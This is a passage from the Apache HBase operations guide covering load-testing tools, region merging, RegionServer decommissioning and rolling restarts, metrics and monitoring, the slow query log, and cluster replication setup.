issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.\n\nThe PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and ability to \"warm up\" the cluster before testing starts.\n\n=== `hbase ltt`\n\nThe `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.\nThe `hbase ltt` command was introduced in HBase 0.98.4.\n\nYou must specify either `-write` or `-update-read` as the first option.\nFor general usage instructions, pass the `-h` option.\n\nTo run LoadTestTool prior to HBase 0.98.4, issue the command +hbase\n org.apache.hadoop.hbase.util.LoadTestTool+.\n\nThe LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLS and visibility labels, testing security-related features, ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.\n\n[[ops.regionmgt]]\n== Region Management\n\n[[ops.regionmgt.majorcompact]]\n=== Major Compaction\n\nMajor compactions can be requested via the HBase shell or link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact%28java.lang.String%29[Admin.majorCompact].\n\nNote: major compactions do NOT do region merges.\nSee <<compaction,compaction>> for more information about compactions.\n\n[[ops.regionmgt.merge]]\n=== Merge\n\nMerge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>\n----\n\nIf you feel you have too many regions and want to consolidate them, Merge is the utility you need.\nMerge must run be done when the cluster is down.\nSee the link:http:\/\/ofps.oreilly.com\/titles\/9781449396107\/performance.html[O'Reilly HBase\n Book] for an example of usage.\n\nYou will need to pass 3 parameters to this application.\nThe first one is the table name.\nThe second one is the fully qualified name of the first region to merge, like \"table_name,\\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.\". The third one is the fully qualified name for the second region to merge.\n\nAdditionally, there is a Ruby script attached to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621] for region merging.\n\n[[node.management]]\n== Node Management\n\n[[decommission]]\n=== Node Decommission\n\nYou can stop an individual RegionServer by running the following script in the HBase directory on the particular node:\n\n----\n$ .\/bin\/hbase-daemon.sh stop regionserver\n----\n\nThe RegionServer will first close all regions and then shut itself down.\nOn shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.\nThe master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the nodes the RegionServer was carrying.\n\n.Disable the Load Balancer before Decommissioning a node\n[NOTE]\n====\nIf the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.\nAvoid any problems by disabling the balancer first.\nSee <<lb,lb>> below.\n====\n\n.Kill Node Tool\n[NOTE]\n====\nIn hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.\nHardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.\nIt deletes all the znodes of the server, starting the recovery process.\nPlug in the script into your monitoring\/fault detection tools to initiate faster failover.\nBe careful how you use this disruptive tool.\nCopy the script if you need to make use of it in a version of hbase previous to hbase-2.0.\n====\n\nA downside to the above stop of a RegionServer is that regions could be offline for a good period of time.\nRegions are closed in order.\nIf many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.\nIn Apache HBase 0.90.2, we added facility for having a node gradually shed its load and then shutdown itself down.\nApache HBase 0.90.2 added the _graceful_stop.sh_ script.\nHere is its usage:\n\n----\n$ .\/bin\/graceful_stop.sh\nUsage: graceful_stop.sh [--config &conf-dir>] [--restart] [--reload] [--thrift] [--rest] &hostname>\n thrift If we should stop\/start thrift before\/after the hbase stop\/start\n rest If we should stop\/start rest before\/after the hbase stop\/start\n restart If we should restart after graceful stop\n reload Move offloaded regions back on to the stopped server\n debug Move offloaded regions back on to the stopped server\n hostname Hostname of server we are to stop\n----\n\nTo decommission a loaded RegionServer, run the following: +$\n .\/bin\/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.\n\n.On `HOSTNAME`\n[NOTE]\n====\nThe `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.\nCheck the list of RegionServers in the master UI for how HBase is referring to servers.\nIt's usually hostname but can also be FQDN.\nWhatever HBase is using, this is what you should pass the _graceful_stop.sh_ decommission script.\nIf you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it and so it will fail when it checks if server is currently running; the graceful unloading of regions will not run.\n====\n\nThe _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.\nIt will verify the region deployed in the new location before it will moves the next region and so on until the decommissioned server is carrying zero regions.\nAt this point, the _graceful_stop.sh_ tells the RegionServer `stop`.\nThe master will at this point notice the RegionServer gone but all regions will have already been redeployed and because the RegionServer went down cleanly, there will be no WAL logs to split.\n\n[[lb]]\n.Load Balancer\n[NOTE]\n====\nIt is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:\n\n[source]\n----\nhbase(main):001:0> balance_switch false\ntrue\n0 row(s) in 0.3590 seconds\n----\n\nThis turns the balancer OFF.\nTo reenable, do:\n\n[source]\n----\nhbase(main):001:0> balance_switch true\nfalse\n0 row(s) in 0.3590 seconds\n----\n\nThe `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.\nIf it exits prematurely because of error, it will not have reset the balancer.\nHence, it is better to manage the balancer apart from `graceful_stop` reenabling it after you are done w\/ graceful_stop.\n====\n\n[[draining.servers]]\n==== Decommissioning several Regions Servers concurrently\n\nIf you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.\nTo gracefully drain multiple regionservers at the same time, RegionServers can be put into a \"draining\" state.\nThis is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root\/draining_ znode.\nThis znode has format `name,port,startcode` just like the regionserver entries under _hbase_root\/rs_ znode.\n\nWithout this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.\nMarking RegionServers to be in the draining state prevents this from happening.\nSee this link:http:\/\/inchoate-clatter.blogspot.com\/2012\/03\/hbase-ops-automation.html[blog\n post] for more details.\n\n[[bad.disk]]\n==== Bad or Failing Disk\n\nIt is good having <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine for the case where a disk plain dies.\nBut usually disks do the \"John Wayne\" -- i.e.\ntake a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.\nIn this case you want to decommission the disk.\nYou have two options.\nYou can link:http:\/\/wiki.apache.org\/hadoop\/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission\n the datanode] or, less disruptive in that only the bad disks data will be rereplicated, can stop the datanode, unmount the bad volume (You can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0). The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general but for some latency spikes, it should keep on chugging.\n\n.Short Circuit Reads\n[NOTE]\n====\nIf you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; when short-circuiting reading, though chmod'd so regionserver cannot have access, because it already has the files open, it will be able to keep reading the file blocks from the bad disk even though the datanode is down.\nMove the regions back after you restart the datanode.\n====\n\n[[rolling]]\n=== Rolling Restart\n\nSome cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.\nIn addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.\nSee the release notes for release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.\n\nThere are multiple ways to restart your cluster nodes, depending on your situation.\nThese methods are detailed below.\n\n==== Using the `rolling-restart.sh` Script\n\nHBase ships with a script, _bin\/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.\nThe script is provided as a template for your own script, and is not explicitly tested.\nIt requires password-less SSH login to be configured and assumes that you have deployed using a tarball.\nThe script requires you to set some environment variables before running it.\nExamine the script and modify it to suit your needs.\n\n._rolling-restart.sh_ General Usage\n====\n----\n\n$ .\/bin\/rolling-restart.sh --help\nUsage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]\n----\n====\n\nRolling Restart on RegionServers Only::\n To perform a rolling restart on the RegionServers only, use the `--rs-only` option.\n This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.\n\nRolling Restart on Masters Only::\n To perform a rolling restart on the active and backup Masters, use the `--master-only` option.\n You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.\n\nGraceful Restart::\n If you specify the `--graceful` option, RegionServers are restarted using the _bin\/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.\n This is safer, but can delay the restart.\n\nLimiting the Number of Threads::\n To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.\n\n[[rolling.restart.manual]]\n==== Manual Rolling Restart\n\nTo retain more control over the process, you may wish to manually do a rolling restart across your cluster.\nThis uses the `graceful-stop.sh` command <<decommission,decommission>>.\nIn this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.\nIf you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.\nThe following is an example of such a command.\nYou may need to tailor it to your environment.\nThis script does a rolling restart of RegionServers only.\nIt disables the load balancer before moving the regions.\n\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &;\n----\n\nMonitor the output of the _\/tmp\/log.txt_ file to follow the progress of the script.\n\n==== Logic for Crafting Your Own Rolling Restart Script\n\nUse the following guidelines if you want to create your own rolling restart script.\n\n. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.\n. Use the hbck utility to ensure that the cluster is consistent.\n+\n----\n\n$ .\/bin\/hbck\n----\n+\nPerform repairs if required.\nSee <<hbck,hbck>> for details.\n\n. Restart the master first.\n You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.\n+\n----\n\n$ .\/bin\/hbase-daemon.sh stop master; .\/bin\/hbase-daemon.sh start master\n----\n\n. Gracefully restart each RegionServer, using a script such as the following, from the Master.\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n+\nIf you are running Thrift or REST servers, pass the --thrift or --rest options.\nFor other available options, run the `bin\/graceful-stop.sh --help` command.\n+\nIt is important to drain HBase regions slowly when restarting multiple RegionServers.\nOtherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.\nThis can negatively affect performance.\nYou can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.\nTo wait for 5 minutes between each RegionServer restart, modify the above script to the following:\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> \/tmp\/log.txt &\n----\n\n. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.\n. Run the `hbck` utility again, to be sure the cluster is consistent.\n\n[[adding.new.node]]\n=== Adding a New Node\n\nAdding a new regionserver in HBase is essentially free, you simply start it like this: `$ .\/bin\/hbase-daemon.sh start regionserver` and it will register itself with the master.\nIdeally you also started a DataNode on the same machine so that the RS can eventually start to have local files.\nIf you rely on ssh to start your daemons, don't forget to add the new hostname in _conf\/regionservers_ on the master.\n\nAt this point the region server isn't serving data because no regions have moved to it yet.\nIf the balancer is enabled, it will start moving regions to the new RS.\nOn a small\/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.\nIt is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one).\n\nThe moved regions will all have 0% locality and won't have any blocks in cache so the region server will have to use the network to serve requests.\nApart from resulting in higher latency, it may also be able to use all of your network card's capacity.\nFor practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB\/s_.\nIn this case, or if you are in a OLAP environment and require having locality, then it is recommended to major compact the moved regions.\n\n[[hbase_metrics]]\n== HBase Metrics\n\nHBase emits metrics which adhere to the link:http:\/\/hadoop.apache.org\/core\/docs\/current\/api\/org\/apache\/hadoop\/metrics\/package-summary.html[Hadoop metrics] API.\nStarting with HBase 0.95footnote:[The Metrics system was redone in\n HBase 0.96. See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. Run the command `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n.* Master:\n.* RegionServer:\n\n. The name of each metric and its current value is displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount ::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) that either took too long to run, or produced too much output.\nThe thresholds for \"too long to run\" and \"too much output\" are configurable, as described below.\nThe output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.\nIt is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.\n\n==== Configuration\n\nThere are two configuration knobs that can be used to adjust the thresholds for when queries are logged.\n\n* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.\n Defaults to 10000, or 10 seconds.\n Can be set to -1 to disable logging by time.\n* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.\n Defaults to 100 megabytes.\n Can be set to -1 to disable logging by size.\n\n==== Metrics\n\nThe slow query log exposes to metrics to JMX.\n\n* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.\n* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.\n\n==== Output\n\nThe output is tagged with operation e.g. `(operationTooSlow)` if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.\nIf not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.\n\n==== Example\n\n\n[source]\n----\n2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {\"tables\":{\"riley2\":{\"puts\":[{\"totalColumns\":11,\"families\":{\"actions\":[{\"timestamp\":1315501284459,\"qualifier\":\"0\",\"vlen\":9667580},{\"timestamp\":1315501284459,\"qualifier\":\"1\",\"vlen\":10122412},{\"timestamp\":1315501284459,\"qualifier\":\"2\",\"vlen\":11104617},{\"timestamp\":1315501284459,\"qualifier\":\"3\",\"vlen\":13430635}]},\"row\":\"cfcd208495d565ef66e7dff9f98764da:0\"}],\"families\":[\"actions\"]}},\"processingtimems\":956,\"client\":\"10.47.34.63:33623\",\"starttimems\":1315501284456,\"queuetimems\":0,\"totalPuts\":1,\"class\":\"HRegionServer\",\"responsesize\":0,\"method\":\"multiPut\"}\n----\n\nNote that everything inside the \"tables\" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP\/port.\nOther client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.\nIn the case that the call is not a client operation, that detailed fingerprint information will be completely absent.\n\nThis particular example, for example, would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the \"vlen,\" or value length, fields of each put in the multiPut.\n\n=== Block Cache Monitoring\n\nStarting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.\nTo view the block cache reports, click .\nFollowing are a few examples of the reporting capabilities.\n\n.Basic Info\nimage::bc_basic.png[]\n\n.Config\nimage::bc_config.png[]\n\n.Stats\nimage::bc_stats.png[]\n\n.L1 and L2\nimage::bc_l1.png[]\n\nThis is not an exhaustive list of all the screens and reports available.\nHave a look in the Web UI.\n\n== Cluster Replication\n\nNOTE: This information was previously available at\nlink:http:\/\/hbase.apache.org#replication[Cluster Replication].\n\nHBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.\nSome use cases for cluster replication include:\n\n* Backup and disaster recovery\n* Data aggregation\n* Geographic data distribution\n* Online data ingestion combined with offline data analytics\n\nNOTE: Replication is enabled at the granularity of the column family.\nBefore enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.\n\n=== Replication Overview\n\nCluster replication uses a source-push methodology.\nAn HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.\nReplication is asynchronous, and the goal of replication is eventual consistency.\nWhen the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that for that column family on the RegionServer managing the relevant region.\n\nWhen data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.\nIn HBase 0.96 and newer (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.\nThis prevents replication loops.\n\nThe WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.\nEach region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.\nThe position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.\n\nThe clusters participating in replication can be of different sizes.\nThe master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.\nIt is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.\nIf a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.\n\n.Terminology Changes\n[NOTE]\n====\nPreviously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.\nThese terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.\n====\n\n.Cluster Topologies\n* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n=== Managing and Configuring Cluster Replication\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable to each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. Check to be sure that replication has not been disabled. `hbase.replication` defaults to `true`.\n. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\nlist_peers:: list all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:\n+\n[source,bash]\n----\n$ HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` \"${HADOOP_HOME}\/bin\/hadoop\" jar \"${HBASE_HOME}\/hbase-server-VERSION.jar\" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>\n----\n+\nThe `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.\n\n=== Detailed Information About Cluster Replication\n\n.Replication Architecture Overview\nimage::replication_overview.png[]\n\n==== Life of a WAL Edit\n\nA single WAL edit goes through several steps in order to be replicated to a slave cluster.\n\n. An HBase client uses a Put or Delete operation to manipulate data in HBase.\n. The region server writes the request to the WAL in a way allows it to be replayed if it is not written successfully.\n. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.\n. In a separate thread, the edit is read from the log, as part of a batch process.\n Only the KeyValues that are eligible for replication are kept.\n Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.\n. The edit is tagged with the master's UUID and added to a buffer.\n When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.\n. The region server reads the edits sequentially and separates them into buffers, one buffer per table.\n After all edits are read, each buffer is flushed using link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], HBase's normal client.\n The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits they are applied, in order to prevent replication loops.\n. In the master, the offset 